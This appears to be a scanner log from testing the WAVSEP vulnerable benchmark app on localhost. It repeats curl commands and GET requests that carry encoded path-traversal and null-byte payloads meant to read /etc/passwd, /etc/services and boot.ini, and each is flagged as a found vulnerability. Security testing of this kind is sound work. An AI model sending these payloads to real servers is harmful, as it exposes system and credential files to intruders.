curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

